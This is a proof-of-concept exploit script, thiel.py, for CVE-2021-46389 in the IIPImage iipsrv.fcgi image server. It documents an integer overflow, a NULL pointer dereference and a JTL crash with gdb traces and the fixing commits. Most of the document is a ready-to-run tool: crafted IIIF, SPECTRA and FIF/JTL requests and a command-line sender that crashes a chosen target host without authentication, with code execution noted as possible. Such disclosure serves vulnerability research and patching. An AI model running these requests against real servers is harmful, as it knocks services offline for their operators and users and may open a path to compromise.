IIPImage Remote Memory Corruption

#!/usr/bin/python3# -*- coding: UTF-8 -*-## thiel.py## IIPImage Multiple Remote Memory Corruption Vulnerabilities## Jeremy Brown [jbrown3264/gmail]## IIPImage is distributed with a server that enables advanced, high-performance# image manipulation for web-based streaming and viewing of high resolution images.# The server component called iipsrv.fcgi processes requests from users and passes# them to command handlers. Several crashes including an integer overflow were# discovered by sending malformed requests to the server, allowing remote users# without authentication to perform denial-of-service attacks or potentially# crafted for remote code execution as the server's running user.## Tested on Ubuntu 20.04 with NGINX fastcgi_pass localhost:9000 configuration## Demo## $ ./thiel.py http://10.0.0.201 --trigger iiif## (gdb) r --bind 0.0.0.0:9000 # 9000 for nginx comms, port 80 externally# ...## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319# (gdb) i r# rax            0x7ffef6d50b68      140733039577960# rbx            0xffffffff          4294967295# rcx            0xb3                179# rdx            0x6                 6# rsi            0x5555556ae20d      93824993649165# rdi            0x7ffef6d50b68      140733039577960# rbp            0x7fffffffc690      0x7fffffffc690# rsp            0x7fffffffc4b8      0x7fffffffc4b8# r8             0x0                 0# r9             0x0                 0# r10            0x55555564f4e0      93824993260768# r11            0x7ffef6d50b68      140733039577960# r12            0xb58               2904# r13            0x81                129# r14            0x1e4               484# r15            0x8                 8# rip            0x7ffff7a53708      0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>## => 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>:  mov    ecx,DWORD PTR [rsi+rdx*1-0x4]## 0  __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319# 1  0x0000555555573b5c in memcpy (__len=6, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34# 2  TileManager::getRegion (this=this@entry=0x7fffffffc7d0, res=res@entry=0, seq=0, ang=90, layers=0, x=<optimized out>, y=<optimized out>, width=<optimized out>, height=<optimized out>) at TileManager.cc:470# 3  0x000055555558c914 in CVT::send (this=this@entry=0x7fffffffd390, session=session@entry=0x7fffffffd8b0) at CVT.cc:222# 4  0x000055555559a06e in IIIF::run (this=0x5555555e2e20, session=0x7fffffffd8b0, src=...) at IIIF.cc:656# 5  0x0000555555566cf4 in main (argc=<optimized out>, argv=<optimized out>) at Main.cc:741## Fixes# - commits 4ed59265fbbd636dc2fbbf325f8ea37ed300a6d9, 882925b295a80ec992063deffc2a3b0d803c3195## CVE-2021-46389#import osimport sysimport argparseimport signalimport requestsPATH = '/fcgi-bin/iipsrv.fcgi'## also there's many params for some functions like fif such as obj, qlt, sds,# cnt, cvt, wid, rgn, etc so the code definitely needs lots of input validation#QUERY_FIF = '?fif='QUERY_IIIF = '?iiif='QUERY_SPECTRA = '?spectra='## Some bugs require a valid file (eg. tiled TIF) to be present on the server (eg. IIIF big region)## sample: https://openslide.cs.cmu.edu/download/openslide-testdata/Generic-TIFF/CMU-1.tiff#VALID_FILE = '/var/www/test.tif'### BUGS ##### Bug #1: Integer overflow @ TileManager::getRegion()## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319## REQ = QUERY_IIIF + VALID_FILE + '/full,32883,500,500/256,/0/default.jpg' # image# REQ = QUERY_IIIF + VALID_FILE + '/full,32884,500,500/256,/0/default.jpg' # image errorREQ_IIIF = QUERY_IIIF + VALID_FILE + '/full,32912,500,500/256,/0/default.jpg' # SIGSEGV# REQ_FIF_WID = QUERY_FIF + VALID_FILE + '&wid=652455&cvt=jpeg' # SIGSEGV (starts at CVT::run instead of IIIF:run)## Bug #2: NULL ptr deref @ SPECTRA::run## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# SPECTRA::run (this=0x5555555e2f70, session=0x7fffffffd8b0, argument=...) at IIPImage.h:335# 335    unsigned int getTileWidth() { return tile_width; };#REQ_SPECTRA = QUERY_SPECTRA + 'x' # no valid file necessary## Bug #3: Another crash @ JTL::run## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# JTL::send (this=this@entry=0x5555555e3200, session=session@entry=0x7fffffffd8c0, resolution=resolution@entry=129165, tile=tile@entry=1) at IIPImage.h:324# 324    unsigned int getImageWidth( int n=0 ) { return image_widths[n]; };#REQ_FIF_JTL = QUERY_FIF + VALID_FILE + '&jtl=129500,1' # try larger value if no crash#### END BUGS ###class Thiel(object):    def __init__(self, args):        self.host = args.host        self.trigger = args.trigger    def run(self):        if(self.trigger == None):            print("error: choose which bug use via --trigger")            return -1        if(self.trigger == 'iiif'):            return self.sendRequest(self.host, REQ_IIIF)        if(self.trigger == 'spectra'):            return self.sendRequest(self.host, REQ_SPECTRA)        if(self.trigger == 'fif_jtl'):            return self.sendRequest(self.host, REQ_FIF_JTL)        return 0    def sendRequest(self, host, req):        session = requests.Session()        try:            resp = session.get(host + PATH + req)        except Exception as error:            print("Error: %s" % error)            return -1        if(b'502 Bad Gateway' in resp.content):            print("done\n")            return 0        else:            print("[-] iipsrv still appears to be up\n")            return -1def signalExit():    sys.exit(-1)def arg_parse():    parser = argparse.ArgumentParser()    parser.add_argument("host",                        type=str,                        help="target host")    parser.add_argument("--trigger",                        "--trigger",                        type=str,                        choices=['iiif', 'spectra', 'fif_jtl'],                        help="which bug to trigger")    args = parser.parse_args()    return argsdef main():    signal.signal(signal.SIGINT, signalExit)    args = arg_parse()    pt = Thiel(args)    result = pt.run()    if(result > 0):        sys.exit(-1)if(__name__ == '__main__'):    main()